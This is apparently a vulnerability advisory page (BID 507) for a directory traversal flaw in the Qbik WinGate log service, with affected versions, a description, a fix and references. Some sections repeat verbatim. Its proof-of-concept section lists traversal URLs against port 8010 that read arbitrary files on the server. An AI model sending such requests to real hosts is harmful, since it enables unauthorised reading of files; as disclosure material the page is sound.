Qbik WinGate Log Service Directory Traversal Vulnerability
BID:507
Info
Qbik WinGate Log Service Directory Traversal Vulnerability
| Bugtraq ID: | 507 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 22 1999 12:00AM |
| Updated: | Feb 22 1999 12:00AM |
| Credit: | eEye Advisory AD02221999 published at the eEYe website February 22, 1999. Additional information posted to Bugtraq by Blue Panda <[email protected]> on October 16, 2000. |
| Vulnerable: |
Qbik WinGate Standard 3.0.5 Qbik WinGate Standard 3.0 Qbik WinGate Standard 2.0 Qbik WinGate Pro 3.0.5 Qbik WinGate Pro 3.0 Qbik WinGate Pro 2.0 Qbik WinGate 4.1 Beta A Qbik WinGate 4.0.1 Qbik WinGate 3.0 |
| Not Vulnerable: | |
Discussion
Qbik WinGate Log Service Directory Traversal Vulnerability
The WinGate log service is configured by default to only allow connections from 127.0.0.1, but can be set to allow connections from anywhere. Either way, there is a vulnerability that will allow any file to be read through the log service port over an http connection.
Update (October 16, 2000):
Blue Panda <[email protected]> has discovered that a variation of the vulnerability exists in recent versions. Using escaped characters, one can achieve the same effect.
The WinGate log service is configured by default to only allow connections from 127.0.0.1, but can be set to allow connections from anywhere. Either way, there is a vulnerability that will allow any file to be read through the log service port over an http connection.
Update (October 16, 2000):
Blue Panda <[email protected]> has discovered that a variation of the vulnerability exists in recent versions. Using escaped characters, one can achieve the same effect.
Exploit / POC
Qbik WinGate Log Service Directory Traversal Vulnerability
There are various ways of exploiting this.
NT and Win9x:
h t t p://www.server.com:8010/c:/
h t t p://www.server.com:8010//
Win9x only:
h t t p://www.server.com:8010/..../
There are various ways of exploiting this.
NT and Win9x:
h t t p://www.server.com:8010/c:/
h t t p://www.server.com:8010//
Win9x only:
h t t p://www.server.com:8010/..../
Solution / Fix
Qbik WinGate Log Service Directory Traversal Vulnerability
Solution:
Qbik has released WinGate 4.1 Beta C which is not susceptible to this vulnerability:
http://wingate.deerfield.com/beta/
Solution:
Qbik has released WinGate 4.1 Beta C which is not susceptible to this vulnerability:
http://wingate.deerfield.com/beta/
References
Qbik WinGate Log Service Directory Traversal Vulnerability
References:
References:
- eEye Digital Security Team Home Page (eEye)
- WinGate Product Homepage (Qbik)